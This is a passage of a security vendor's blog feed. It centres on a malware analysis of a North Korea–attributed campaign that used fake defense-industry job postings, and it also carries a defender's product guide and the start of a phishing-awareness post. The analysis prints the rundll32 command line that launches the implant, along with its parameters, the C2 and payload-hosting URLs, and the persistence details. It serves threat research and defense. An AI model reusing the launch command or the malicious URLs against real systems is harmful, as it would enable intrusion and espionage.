    • The first parameter belongs to the decryption key used to start the malicious activity.
    • This could be chosen by the author to make the value more realistic
  • Campaign ID

DLL Workflow

The analysis of the DLL extracted from the ‘docm’ files (the 2nd stage of the infection) revealed  the existence of two types of operation for these DLLs:

DLL direct execution:

  • The DLL unpacks a new payload in the system.

Drive-by DLLs:

  • The DLL downloads a new DLL implant from a remote server delivering an additional DLL payload into the system.

For both methods, the implant starts collecting the target information and then contacts the command and control (C2) server

We focused our analysis into the DLLs files that are unpacked into the system.

Implant Analysis

The DLL implant will be executed after the user interacts by opening the Office file. As we explained, the p-code of the VBA macro contains parts of the parameters needed to execute the implant into the system.

The new DLL implant file will be unpacked (depending of the campaign ID) inside a folder inside the AppData folder of the user in execution:

C:\Users\user\AppData\Local\Microsoft\Notice\wsdts.db

The DLL file, must be launched with 5 different parameters if we want to observe the malicious connection within the C2 domain; in our analysis we observed how the DLL was launched with the following command line:

C:\Windows\System32\rundll32.exe “C:\Users\user\AppData\Local\Microsoft\Notice\wsdts.db”, sqlite3_steps S-6-81-3811-75432205-060098-6872 0 0 61 1

The required parameters to launch the malicious implant are:

Parameter number Description
1 Decryption key
2 Unused value, hardcoded in the DLL
3 Unused value, hardcoded in the DLL
4 Campaign identifier
5 Unused value, hardcoded in the DLL

 

As we explained, the implants are patched SQLITE files and that is why we could find additional functions that are used to launch the malicious implant, executing the binary with certain parameters. It is necessary to use a specific export ‘sqlite3_steps’ plus the parameters mentioned before.

Analyzing the code statically we could observe that the payload only checks 2 of these 5 parameters but all of them must be present in order to execute the implant:

sqlite malicious function

Phase Three: Network Evasion Techniques

Attackers are always trying to remain undetected in their intrusions which is why it is common to observe techniques such as mimicking the same User-Agent that is present in the system, in order to remain under the radar. Using the same User-Agent string from the victim’s web browser configurations, for example, will help avoid network-based detection systems from flagging outgoing traffic as suspicious. In this case, we observed how, through the use of the Windows API ObtainUserAgentString, the attacker obtained the User-Agent and used the value to connect to the command and control server:

If the implant cannot detect the User-Agent in the system, it will use the default Mozilla User-Agent instead:

Running the sample dynamically and intercepting the TLS traffic, we could see the connection to the command and control server:

Unfortunately, during our analysis, the C2 was not active which limited our ability for further analysis.

The data sent to the C2 channel contains the following information:

Parameter Description
C2 C2 configured for that campaign
ned Campaign identifier
key 1 AES key used to communicate with the C2
key 2 AES key used to communicate with the C2
sample identifier Sample identifier sent to the C2 server
gl Size value sent to the C2 server
hl Unknown parameter always set to 0

We could find at least 5 different campaign IDs in our analysis, which suggests that the analysis in this document is merely the tip of the iceberg:

Dotx file Campaign ID
61.dotm 0
17.dotm 17
43.dotm 43
83878C91171338902E0FE0FB97A8C47A.dotm 204
******_dds_log 100

Phase Four: Persistence

In our analysis we could observe how the adversary ensures persistence by delivering an LNK file into the startup folder

The value of this persistent LNK file is hardcoded inside every sample:

Dynamically, and through the Windows APIs NtCreateFile and NtWriteFile, the LNK is written in the startup folder. The LNK file contains the path to execute the DLL file with the required parameters.

Additional Lures: Relationship to 2020 Diplomatic and Political Campaign

Further investigation into the 2020 campaign activity revealed additional links indicating the adversary was using domestic South Korean politics as lures. The adversary created several documents in the Korean language using the same techniques as the ones seen in the defense industry lures. One notable document, with the title US-ROK Relations and Diplomatic Security in both Korean and English, appeared on 6 April 2020 with the document author JangSY.

US-ROK Relation and Diplomatic Security

The document was hosted on the file sharing site hxxps://web.opendrive.com/api/v1/download/file.json/MzBfMjA1Njc0ODhf?inline=0 and contained an embedded link referring to a remote DOTM file hosted on another file sharing site (od.lk). The BASE64 coded value MzBfMjA1Njc0ODhf is a unique identifier for the user associated with the file sharing platform od.lk.

A related document discovered with the title test.docx indicated that the adversary began testing these documents in early April 2020. This document contained the same content as the above but was designed to test the downloading of the remote template file by hosting it on a private IP address. The document that utilized pubmaterial.dotm for its remote template also made requests to the URL hxxp://saemaeul.mireene.com/skin/visit/basic/.

This domain (saemaeul.mireene.com) is connected to numerous other Korean language malicious documents that also appeared in 2020 including documents related to political or diplomatic relations. One such document (81249fe1b8869241374966335fd912c3e0e64827) was using the 21st National Assembly Election as part of the title, potentially indicating those interested in politics in South Korea were a target. For example, another document (16d421807502a0b2429160e0bd960fa57f37efc4) used the name of an individual, director Jae-chun Lee. It also shared the same metadata.

The original author of these documents was listed as Seong Jin Lee according to the embedded metadata information. However, the last modification author (Robot Karll) used by the adversary during document template creation is unique to this set of malicious documents. Further, these documents contain political lures pertaining to South Korean domestic policy that suggests that the targets of these documents also spoke Korean.

Relationship to 2019 Falsified Job Recruitment Campaign

A short-lived campaign from 2019 using India’s aerospace industry as a lure used what appears to be very similar methods to this latest campaign using the defense industry in 2020. Some of the TTPs from the 2020 campaign match that of the operation in late 2019. The activity from 2019 has also been attributed to Hidden Cobra by industry reporting.

The campaign from October 2019 also used aerospace and defense as a lure, using copies of legitimate jobs just like we observed with the 2020 campaign. However, this campaign was isolated to the Indian defense sector and from our knowledge did not expand beyond this. This document also contained a job posting for a leading aeronautics company in India; this company is focused on aerospace and defense systems. This targeting aligns with the 2020 operation and our analysis reveals that the DLLs used in this campaign were also modified SQL Lite DLLs.

Based on our analysis, several variants of the implant were created in the October 2019 timeframe, indicating the possibility of additional malicious documents.

Sha1 Compile Date File Name
f3847f5de342632f8f9e2901f16b7127472493ae 10/12/2019 MFC_dll.DLL
659c854bbdefe692ee8c52761e7a8c7ee35aa56c 10/12/2019 MFC_dll.DLL
35577959f79966b01f520e2f0283969155b8f8d7 10/12/2019 MFC_dll.DLL
975ae81997e6cd8c8a3901308d33c868f23e638f 10/12/2019 MFC_dll.DLL

 

One notable difference with the 2019 campaign is the main malicious document contained the implant payload, unlike the 2020 campaign that relied on the Microsoft Office remote template injection technique. Even though the technique is different, we did observe likenesses as we began to dissect the remote template document. There are some key similarities within the VBA code embedded in the documents. Below we see the 2019 (left) and 2020 (right) side-by-side comparison of two essential functions, that closely match each other, within the VBA code that extracts/drops/executes the payload.

VBA code of 13c47e19182454efa60890656244ee11c76b4904 (left) and acefc63a2ddbbf24157fc102c6a11d6f27cc777d (right)

The VBA macro drops the first payload of thumbnail.db at the filepath, which resembles the filepath used in 2020.

The VB code also passes the decryption key over to the DLL payload, thumbnail.db. Below you can see the code within thumbnail.db accepting those parameters.

Unpacked thumbnail.db bff1d06b9ef381166de55959d73ff93b

What is interesting is the structure in which this information is being passed over. This 2019 sample is identical to what we documented within the 2020 campaign.

Another resemblance discovered was the position of the .dll implant existing in the exact same location for both 2019 and 2020 samples; “o” field under “UserForms1”.

“o” field of 13c47e19182454efa60890656244ee11c76b4904

All 2020 .dotm IoCs contain the same .dll implant within the “o” field under “UserForms1”, however, to not overwhelm this write-up with separate screenshots, only one sample is depicted below. Here you can see the parallel between both 2019 and 2020 “o” sections.

“o” field of acefc63a2ddbbf24157fc102c6a11d6f27cc777d

Another similarity is the encoding of double base64, though in the spirit of competing hypothesis, we did want to note that other adversaries may also use this type of encoding. However, when you couple these similarities with the same lure of an Indian defense contractor, the pendulum starts to lean more to one side of a possible common author between both campaigns. This may indicate another technique being added to the adversary’s arsenal of attack vectors.

One method to keep the campaign dynamic and more difficult to detect is hosting implant code remotely. There is one disadvantage of embedding an implant within a document sent to a victim; the implant code could be detected before the document even reaches the victim’s inbox. Hosting it remotely enables the implant to be easily switched out with new capabilities without running the risk of the document being classified as malicious.

**-HAL-MANAGER.doc UserForm1 with double base64 encoded DLL

17.DOTM UserForm1 with double base64 encoded DLL from ******_DSS_SE.docx

According to a code similarity analysis, the implant embedded in **-HAL-Manager.doc contains some similarities to the implants from the 2020 campaign. However, we believe that the implant utilized in the 2019 campaign associated with **-Hal-Manager.doc may be another component. First, besides the evident similarities in the Visual Basic macro code and the method for encoding (double base64) there are some functional level similarities. The DLL file is run in a way with similar parameters.

DLL execution code **-Hal-Manager.doc implant

DLL execution code 2020 implant

Campaign Context: Victimology

The victimology is not exactly known due to the lack of spear phishing emails uncovered; however, we can obtain some insight from the analysis of telemetry information and lure document context. The lure documents contained job descriptions for engineering and project management positions in relationship to active defense contracts. The individuals receiving these documents in a targeted spear phishing campaign were likely to have an interest in the content within these lure documents, as we have observed in previous campaigns, as well as some knowledge or relationship to the defense industry.

Infrastructure Insights

Our analysis of the 2019 and 2020 campaigns reveals some interesting insight into the command and control infrastructure behind them, including domains hosted in Italy and the United States. During our investigation we observed a pattern of using legitimate domains to host command and control code. This is beneficial to the adversary as most organizations do not block trusted websites, which allows for the potential bypass of security controls. The adversary took the effort to compromise the domains prior to launching the actual campaign. Further, both 2019 and 2020 job recruitment campaigns shared the same command and control server hosted at elite4print.com.

The domain mireene.com with its various sub-domains have been used by Hidden Cobra in 2020. The domains identified to be used in various operations in 2020 falling under the domain mireene.com are:

  • saemaeul.mireene.com
  • orblog.mireene.com
  • sgmedia.mireene.com
  • vnext.mireene.com
  • nhpurumy.mireene.com
  • jmable.mireene.com
  • jmdesign.mireene.com
  • all200.mireene.com

Some of these campaigns use similar methods as the 2020 defense industry campaign:

  • Malicious document with the title European External Action Service [8]
  • Document with Korean language title 비건 미국무부 부장관 서신doc (U.S. Department of State Secretary of State Correspondence 20200302.doc).

Techniques, Tactics and Procedures (TTPS)

The TTPs of this campaign align with those of previous Hidden Cobra operations from 2017 using the same defense contractors as lures. The 2017 campaign also utilized malicious Microsoft Word documents containing job postings relating to certain technologies such as job descriptions for engineering and project management positions involving aerospace and military surveillance programs. These job descriptions are legitimate and taken directly from the defense contractor’s website. The exploitation method used in this campaign relies upon a remote Office template injection method, a technique that we have seen state actors use recently.

However, it is not uncommon to use tools such as EvilClippy to manipulate the behavior of Microsoft Office documents. For example, threat actors can use pre-built kits to manipulate clean documents and embed malicious elements; this saves time and effort. This method will generate a consistent format that can be used throughout campaigns. As a result, we have observed a consistency with how some of the malicious elements are embedded into the documents (i.e. double base64 encoded payload). Further mapping these techniques across the MITRE ATT&CK framework enables us to visualize different techniques the adversary used to exploit their victims.

MITRE ATT&CK mapping for malicious documents

These Microsoft Office templates are hosted on a command and control server and the downloaded link is embedded in the first stage malicious document.

The job postings from these lure documents are positions for work with specific US defense programs and groups:

  • F-22 Fighter Jet Program
  • Defense, Space and Security (DSS)
  • Photovoltaics for space solar cells
  • Aeronautics Integrated Fighter Group
  • Military aircraft modernization programs

Like previous operations, the adversary is using these lures to target individuals, likely posing as a recruiter or someone involved in recruitment. Some of the job postings we have observed:

  • Senior Design Engineer
  • System Engineer

Professional networks such as LinkedIn could be a place used to deliver these types of job descriptions.

Defensive Architecture Recommendations

Defeating the tactics, techniques and procedures utilized in this campaign requires a defense in depth security architecture that can prevent or detect the attack in the early stages. The key controls in this case would include the following:

  1. Threat Intelligence Research and Response Program. Its critical to keep up with the latest Adversary Campaigns targeting your specific vertical. A robust threat response process can then ensure that controls are adaptable to the TTPs and, in this case, create heightened awareness
  2. Security Awareness and Readiness Program. The attackers leveraged spear-phishing with well-crafted lures that would be very difficult to detect initially by protective technology. Well-trained and ready users, informed with the latest threat intelligence on adversary activity, are the first line of defense.
  3. End User Device Security. Adaptable endpoint security is critical to stopping this type of attack early, especially for users working from home and not behind the enterprise web proxy or other layered defensive capability. Stopping or detecting the first two stages of infection requires an endpoint security capability of identifying file-less malware, particularly malicious Office documents and persistence techniques that leverage start-up folder modification.
  4. Web Proxy. A secure web gateway is an essential part of enterprise security architecture and, in this scenario, can restrict access to malicious web sites and block access to the command and control sites.
  5. Sec Ops – Endpoint Detection and Response (EDR) can be used to detect techniques most likely in stages 1, 2 or 4. Additionally, EDR can be used to search for the initial documents and other indicators provided through threat analysis.

For further information on how McAfee Endpoint Protection and EDR can prevent or detect some of the techniques used in this campaign, especially use of malicious Office documents, please refer to these previous blogs and webinar:

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ens-10-7-rolls-back-the-curtain-on-ransomware/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-to-use-mcafee-atp-to-protect-against-emotet-lemonduck-and-powerminer/
https://www.mcafee.com/enterprise/en-us/forms/gated-form.html?docID=video-6157567326001

Indicators of Compromise

SHA256 File Name
322aa22163954ff3ff017014e357b756942a2a762f1c55455c83fd594e844fdd ******_DSS_SE.docx

 

a3eca35d14b0e020444186a5faaba5997994a47af08580521f808b1bb83d6063 ******_PMS.docx

 

d1e2a9367338d185ef477acc4d91ad45f5e6a7d11936c3eb4be463ae0b119185 ***_JD_2020.docx
ecbe46ca324096fd5e35729f39fa3bda9226bbefd6286d53e61b1be56a36de5b ***_2020_JD_SDE.docx
40fbac7a241bea412734134394ca81c0090698cf0689f2b67c54aa66b7e04670 83878C91171338902E0FE0FB97A8C47A.dotm
6a3446b8a47f0ab4f536015218b22653fff8b18c595fbc5b0c09d857eba7c7a1 ******_AERO_GS.docx
df5536c254a5d9ac626dbff7525de8301729807433d377db807ce3d8bc7c3ffe **_IFG_536R.docx
1b0c82e71a53300c969da61b085c8ce623202722cf3fa2d79160dac16642303f 43.dotm
d7ef8935437d61c975feb2bd826d018373df099047c33ad7305585774a272625 17.dotm
49724ee7a6baf421ac5a2a3c93d32e796e2a33d7d75bbfc02239fc9f4e3a41e0 Senior_Design_Engineer.docx

 

66e5371c3da7dc9a80fb4c0fabfa23a30d82650c434eec86a95b6e239eccab88 61.dotm
7933716892e0d6053057f5f2df0ccadf5b06dc739fea79ee533dd0cec98ca971 ******_spectrolab.docx
43b6b0af744124da5147aba81a98bc7188718d5d205acf929affab016407d592 ***_ECS_EPM.docx
70f66e3131cfbda4d2b82ce9325fed79e1b3c7186bdbb5478f8cbd49b965a120 ******_dds_log.jpg
adcdbec0b92da0a39377f5ab95ffe9b6da9682faaa210abcaaa5bd51c827a9e1 21 국회의원 선거 관련.docx
dbbdcc944c4bf4baea92d1c1108e055a7ba119e97ed97f7459278f1491721d02 외교문서 관련(이재춘국장).docx

 

URLs
hxxps://www.anca-aste.it/uploads/form/02E319AF73A33547343B71D5CB1064BC.dotm
hxxp://www.elite4print.com/admin/order/batchPdfs.asp
hxxps://www.sanlorenzoyacht.com/newsl/uploads/docs/43.dotm
hxxps://www.astedams.it/uploads/template/17.dotm
hxxps://www.sanlorenzoyacht.com/newsl/uploads/docs/1.dotm
hxxps://www.anca-aste.it/uploads/form/******_jd_t034519.jpg
hxxp://saemaeul.mireene.com/skin/board/basic/bin
hxxp://saemaeul.mireene.com/skin/visit/basic/log
hxxps://web.opendrive.com/api/v1/download/file.json/MzBfMjA1Njc0ODhf?inline=0
hxxps://od.lk/d/MzBfMjA1Njc0ODdf/pubmaterial.dotm
hxxps://www.ne-ba.org/files/gallery/images/83878C91171338902E0FE0FB97A8C47A.dotm

Conclusion

In summary, ATR has been tracking a targeted campaign focusing on the aerospace and defense industries using false job descriptions. This campaign looks very similar, based on shared TTPs, with a campaign that occurred in 2017 that also targeted some of the same industry. This campaign began early April 2020 with the latest activity in mid-June. The campaign’s objective is to collect information from individuals connected to the industries in the job descriptions.

Additionally, our forensic research into the malicious documents show they were created by the same adversary, using Korean and English language systems. Further, discovery of legitimate template files used to build these documents also sheds light on some of the initial research put into the development of this campaign. While McAfee ATR has observed these techniques before, in previous campaigns in 2017 and 2019 using the same TTPs, we can conclude there has been an increase in activity in 2020.

McAfee detects these threats as

  • Trojan-FRVP!2373982CDABA
  • Generic Dropper.aou
  • Trojan-FSGY!3C6009D4D7B2
  • Trojan-FRVP!CEE70135CBB1
  • W97M/Downloader.cxu
  • Trojan-FRVP!63178C414AF9
  • Exploit-cve2017-0199.ch
  • Trojan-FRVP!AF83AD63D2E3
  • RDN/Generic Downloader.x
  • W97M/Downloader.bjp
  • W97M/MacroLess.y

NSP customers will have new signatures added to the “HTTP: Microsoft Office OLE Arbitrary Code Execution Vulnerability (CVE-2017-0199)” attack name. The updated attack is part of our latest NSP sigset release: sigset 10.8.11.9 released on 28th July 2020.The KB details can be found here: KB55446

[1] https://www.bbc.co.uk/news/business-53026175

[2] https://www.welivesecurity.com/2020/06/17/operation-interception-aerospace-military-companies-cyberspies/

[3] https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and

[4] https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and

5 https://www.us-cert.gov/northkorea

[5] https://www.virustotal.com/gui/file/4a08c391f91cc72de7a78b5fd5e7f74adfecd77075e191685311fa598e07d806/detection – Gamaredon Group

[6] https://docs.microsoft.com/en-us/openspecs/office_standards/ms-docx/550efe71-4f40-4438-ac89-23ec1c1d2182

[7] https://www.welivesecurity.com/2020/06/17/operation-interception-aerospace-military-companies-cyberspies/

[8] https://otx.alienvault.com/pulse/5e8619b52e480b485e58259a

The post Operation (노스 스타) North Star A Job Offer That’s Too Good to be True? appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/feed/ 0
McAfee Defender’s Blog: Operation North Star Campaign https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-defenders-blog-operation-north-star-campaign/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-defenders-blog-operation-north-star-campaign/#respond Thu, 30 Jul 2020 04:01:23 +0000 /blogs/?p=103359

Building Adaptable Security Architecture Against the Operation North Star Campaign Operation North Star Overview Over the last few months, we have seen attackers take advantage of the pandemic as a cover to launch cyberattacks. One such example is a campaign that McAfee Advanced Threat Research (ATR) observed as an increase in malicious cyber activity targeting […]

The post McAfee Defender’s Blog: Operation North Star Campaign appeared first on McAfee Blogs.

]]>

Building Adaptable Security Architecture Against the Operation North Star Campaign

Operation North Star Overview

Over the last few months, we have seen attackers take advantage of the pandemic as a cover to launch cyberattacks. One such example is a campaign that McAfee Advanced Threat Research (ATR) observed as an increase in malicious cyber activity targeting the Aerospace & Defense industry. In this campaign McAfee ATR discovered a series of malicious documents containing job postings taken from leading defense contractors to be used as lures, in a very targeted fashion. This type of campaign has appeared before, in 2017 and 2019 using similar techniques, but the 2020 campaign has some distinct differences in implants, infrastructure and spear phishing lures. For a more detailed analysis of this campaign please see the McAfee ATR blog.

This blog is focused on how to build an adaptable security architecture to increase your resilience against these types of attacks and specifically, how McAfee’s portfolio delivers the capability to prevent, detect and respond against the tactics and techniques used in the Operation North Star campaign.

Gathering Intelligence on Operation North Star

As always, building adaptable defensive architecture starts with intelligence. In most organizations, the Security Operations team is responsible for threat intelligence analysis, as well as threat and incident response. McAfee Insights (https://www.mcafee.com/enterprise/en-us/lp/insights-dashboard1.html#) is a great tool for the threat intel analyst and threat responder. The Insights Dashboard identifies prevalence and severity of emerging threats across the globe which enables the Security Operations Center (SOC) to prioritize threat response actions and gather relevant cyber threat intelligence (CTI) associated with the threat, in this case the Operation North Star campaign. The CTI is provided in the form of technical Indicators of Compromise (IOCs) as well as MITRE ATT&CK framework tactics and techniques. As a threat intel analyst or responder, you can drill down to gather more specific information on Operation North Star, such as prevalence and links to other sources of information. You can further drill down to gather more specific actionable intelligence such as indicators of compromise and tactics/techniques aligned to the MITRE ATT&CK framework.

From the McAfee ATR blog, you can see that Operation North Star leverages tactics and techniques common to other APT campaigns, such as spear phishing for Initial Access, exploited system tools and signed binaries, modification of Registry Keys/Startup folder for persistence and encoded traffic for command and control.

Defensive Architecture Overview

Today’s digital enterprise is a hybrid environment of on-premise systems and cloud services with multiple entry points for attacks like Operation North Star. The work from home operating model forced by COVID-19 has only expanded the attack surface and increased risk for successful spear phishing attacks if organizations did not adapt their security posture and increase training for remote workers. Mitigating the risk of attacks like Operation North Star requires a security architecture with the right controls at the device, on the network and in security operations (sec ops). The Center for Internet Security (CIS) Top 20 Cyber Security Controls provides a good guide to build that architecture. The following outlines the key security controls needed at each layer of the architecture to protect your enterprise against Operation North Star tactics and techniques.

Initial Access Stage Defensive Overview

According to Threat Intelligence and Research, the initial access is performed either through vulnerability exploitation or spear phishing attachments. As attackers can quickly change spear phishing attachments or link locations, it is important to have layered defenses that include user awareness training and response procedures, intelligence and behavior-based malware defenses on email systems, web proxy and endpoint systems, and finally sec ops playbooks for early detection and response against suspicious email attachments or other phishing techniques The following chart summarizes the controls expected to have the most effect against initial stage techniques and the McAfee solutions to implement those controls where possible.

MITRE Tactic MITRE Techniques CSC Controls McAfee Capability
Initial Access Spear Phishing Attachments (T1566.001) CSC 7 – Email and Web Browser Protection

CSC 8 – Malware Defenses

CSC 17 – User Awareness

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection,

Web Gateway (MWG), Advanced Threat Defense, Web Gateway Cloud Service (WGCS)

Initial Access Spear Phishing Link (T1566.002) CSC 7 – Email and Web Browser Protection

CSC 8 – Malware Defenses

CSC 17 – User Awareness

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection,

Web Gateway (MWG), Advanced Threat Defense, Web Gateway Cloud Service (WGCS)

Initial Access Spear Phishing (T1566.003) Service CSC 7 – Email and Web Browser Protection

CSC 8 – Malware Defenses

CSC 17 – User Awareness

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection,

Web Gateway (MWG), Advanced Threat Defense, Web Gateway Cloud Service (WGCS)

For additional information on how McAfee can protect against suspicious email attachments, review this additional blog post.

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-protects-against-suspicious-email-attachments/

Exploitation Stage Defensive Overview

The exploitation stage is where the attacker gains access to the target system. Protection against Operation North Star at this stage is heavily dependent on adaptable anti-malware on both end user devices and servers, restriction of application execution, and security operations tools like endpoint detection and response sensors.

McAfee Endpoint Security 10.7 provides a defense in depth capability including signatures and threat intelligence to cover known bad indicators or programs, as well as machine-learning and behavior-based protection to reduce the attack surface against Operation North Star and detect new exploitation attack techniques. This attack leverages weaponized documents with links to external template files on a remote server. McAfee Threat Prevention and Adaptive Threat Protection modules protect against these techniques.

Additionally, MVISION EDR provides proactive detection capability on Execution and Defensive Evasion techniques identified in the exploit stage analysis. Please read further to see MVISION EDR in action against Operation North Star.

The following chart summarizes the critical security controls expected to have the most effect against exploitation stage techniques and the McAfee solutions to implement those controls where possible.

MITRE Tactic MITRE Techniques CSC Controls McAfee Portfolio Mitigation
Execution User Execution (T1204) CSC 5 Secure Configuration

CSC 8 Malware Defenses

CSC 17 Security Awareness

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), Web Gateway and Network Security Platform
Execution Command and Scripting Interpreter (T1059)

 

CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), MVISION EDR
Execution Shared Modules (T1129) CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC)
Persistence Boot or Autologon Execution (T1547) CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7 Threat Prevention, MVISION EDR
Defensive Evasion Template Injection (T1221) CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR
Defensive Evasion Signed Binary Proxy Execution (T1218) CSC 4 Control Admin Privileges

CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control, MVISION EDR
Defensive Evasion Deobfuscate/Decode Files or Information (T1027)

 

CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR

For more information on how McAfee Endpoint Security 10.7 can prevent some of the techniques used in the Operation North Star exploit stage, review this additional blog post.

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-amsi-integration-protects-against-malicious-scripts/

Impact Stage Defensive Overview

The impact stage is where the attacker encrypts the target system, data and perhaps moves laterally to other systems on the network. Protection at this stage is heavily dependent on adaptable anti-malware on both end user devices and servers, network controls and security operation’s capability to monitor logs for anomalies in privileged access or network traffic. The following chart summarizes the controls expected to have the most effect against impact stage techniques and the McAfee solutions to implement those controls where possible.

MITRE Tactic MITRE Techniques CSC Controls McAfee Portfolio Mitigation
Discovery Account Discovery (T1087) CSC 4 Control Use of Admin Privileges

CSC 5 Secure Configuration

CSC 6 Log Analysis

MVISION EDR, MVISION Cloud, Cloud Workload Protection
Discovery System Information Discovery (T1082) CSC 4 Control Use of Admin Privileges

CSC 5 Secure Configuration

CSC 6 Log Analysis

MVISION EDR, MVISION Cloud, Cloud Workload Protection
Discovery System Owner/User Discovery (T1033) CSC 4 Control Use of Admin Privileges

CSC 5 Secure Configuration

CSC 6 Log Analysis

MVISION EDR, MVISION Cloud, Cloud Workload Protection
Command and Control Encrypted Channel (T1573) CSC 8 Malware Defenses

CSC 12 Boundary Defenses

Web Gateway, Network Security Platform

Hunting for Operation North Star Indicators

As a threat intel analyst or hunter, you might want to quickly scan your systems for any indicators you received on Operation North Star. Of course, you can do that manually by downloading a list of indicators and searching with available tools. However, if you have MVISION EDR and Insights, you can do that right from the console, saving precious time. Hunting the attacker can be a game of inches so every second counts. Of course, if you found infected systems or systems with indicators, you can take action to contain and start an investigation for incident response immediately from the MVISION EDR console.

Proactively Detecting Operation North Star Techniques

Many of the exploit stage techniques in this attack use legitimate Windows processes and applications to either exploit or avoid detection. We demonstrated above how the Endpoint Protection Platform can disrupt the weaponized documents but, by using MVISION EDR, you can get more visibility. As security analysts, we want to focus on suspicious techniques used by winword.exe as this attack leverages weaponized documents. On MVISION EDR we got the first threat detection on the monitoring dashboard for WINWORD.EXE at a Medium Risk.

The dashboard also provides a detailed look at the process activity which, in this case, is the attempt to perform the template injection.

 

We also received 2 alerts due to the rundll32 usage:

1)            Loaded non-common file with specified parameters via rundll32 utility

2)            Suspicious process would have been cleaned by Endpoint Protection (in observe mode)

Monitoring or Reporting on Operation North Star Events

Events from McAfee Endpoint Protection and Web Gateway play a key role in Lazarus incident and threat response. McAfee ePO centralizes event collection from all managed endpoint systems. As a threat responder, you may want to create a dashboard for Lazarus-related threat events to understand current exposure. Here is a list (not exhaustive) of Lazarus-related threat events as reported by McAfee Endpoint Protection Platform (Threat Prevention module), with On-Access Scan and Global Threat Intelligence enabled, and McAfee Web Gateway with Global Threat Intelligence enabled as well.

McAfee Endpoint Threat Prevention Events
Generic Trojan.dz Generic Dropper.aou
RDN/Generic PWS.y W97M/Downloader.cxz
Trojan-FRVP!2373982CDABA Trojan-FRVP!AF83AD63D2E3
Generic Dropper.aou W97M/Downloader.bjp
Trojan-FSGY!3C6009D4D7B2 W97M/MacroLess.y
Trojan-FRVP!CEE70135CBB1 Artemis!9FD35BAD075C
W97M/Downloader.cxu RDN/Generic.dx
Trojan-FRVP!63178C414AF9 Artemis!0493F4062899
Exploit-cve2017-0199.ch Artemis!25B37C971FD7

 

McAfee Web Gateway Events
Generic Trojan.dz W97M/Downloader.cxz
RDN/Generic PWS.y BehavesLike.Downloader.dc
Trojan-FRVP!2373982CDABA W97M/MacroLess.y
Trojan-FSGY!3C6009D4D7B2 BehavesLike.Win32.Dropper.hc
BehavesLike.Downloader.dc Artemis
BehavesLike.Downloader.tc

Summary

To defeat targeted threat campaigns, defenders must collaborate internally and externally to build an adaptive security architecture which will make it harder for threat actors to succeed and build resilience in the business. This blog highlights how to use McAfee’s security solutions to prevent, detect and respond to Operation North Star and attackers using similar techniques.

McAfee ATR is actively monitoring this campaign and will continue to update McAfee Insights and its social networking channels with new and current information. Want to stay ahead of the adversaries? Check out McAfee Insights for more information.

The post McAfee Defender’s Blog: Operation North Star Campaign appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-defenders-blog-operation-north-star-campaign/feed/ 0
How to Keep Your Data Safe From the Latest Phishing Scam https://www.mcafee.com/blogs/consumer/consumer-threat-notices/the-latest-phishing-scam/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/the-latest-phishing-scam/#respond Wed, 29 Jul 2020 23:43:38 +0000 /blogs/?p=104121

As users, we’ll do just about anything to ensure that our devices run as efficiently as possible. This includes renewing subscriptions to online services we use daily. However, cybercriminals often take advantage of these tendencies as part of their malicious schemes. We saw this in action this week, as Tech Republic recounted two recent phishing […]

The post How to Keep Your Data Safe From the Latest Phishing Scam appeared first on McAfee Blogs.

]]>

As users, we’ll do just about anything to ensure that our devices run as efficiently as possible. This includes renewing subscriptions to online services we use daily. However, cybercriminals often take advantage of these tendencies as part of their malicious schemes. We saw this in action this week, as Tech Republic recounted two recent phishing attacks impersonating a software subscription company using a “subscription renewal” scam to trap unsuspecting users into giving up their personal and financial information.

How These Phishing Scams Work

These sneaky phishing scams all begin with an email sent to the victim’s inbox containing fraudulent links. The first one is hosted on a fake web domain, which is registered by the website builder Wix – meaning just about anyone could have created the illicit link. The scammer sends out an email telling the user that the software has an updated brand name and that they should renew their subscription to the platform by a certain due date. The email contains a link that says, “Click to Renew,” taking the victim to a submission form requesting sensitive information, including their name, address, and credit card number.

Then there’s the second but similar campaign, which also warns the recipient that their subscription has expired and needs to be renewed by a certain date. However, the link contained in this phishing email is to an actual PayPal page that prompts them to enter their payment details. This sneaky tactic is likely to trip up unsuspecting users since the real subscription service does accept PayPal. However, the payment page on a user’s real account page would not redirect them to the PayPal site, as this phishing scam does.

Protect Your Personal Data

In both schemes, the scammers attempt to harvest either the victims’ software subscription credentials or PayPal credentials by stating that the victim must renew before a specific date. Hackers tend to trick consumers by creating a sense of urgency, as tech-savvy users like you and I consider device software to be an essential part of our everyday lives. Luckily, there are steps that we can take to continue to live our lives free from worry. To avoid the digital drama that comes with phishing scams, follow these tips:

Go directly to the source

Be skeptical of emails or text messages claiming to be from organizations with peculiar asks or information that seems too good to be true. Instead of clicking on a link within the email or text, it’s best to go straight to the organization’s website or contact customer service.

Be cautious of emails asking you to act

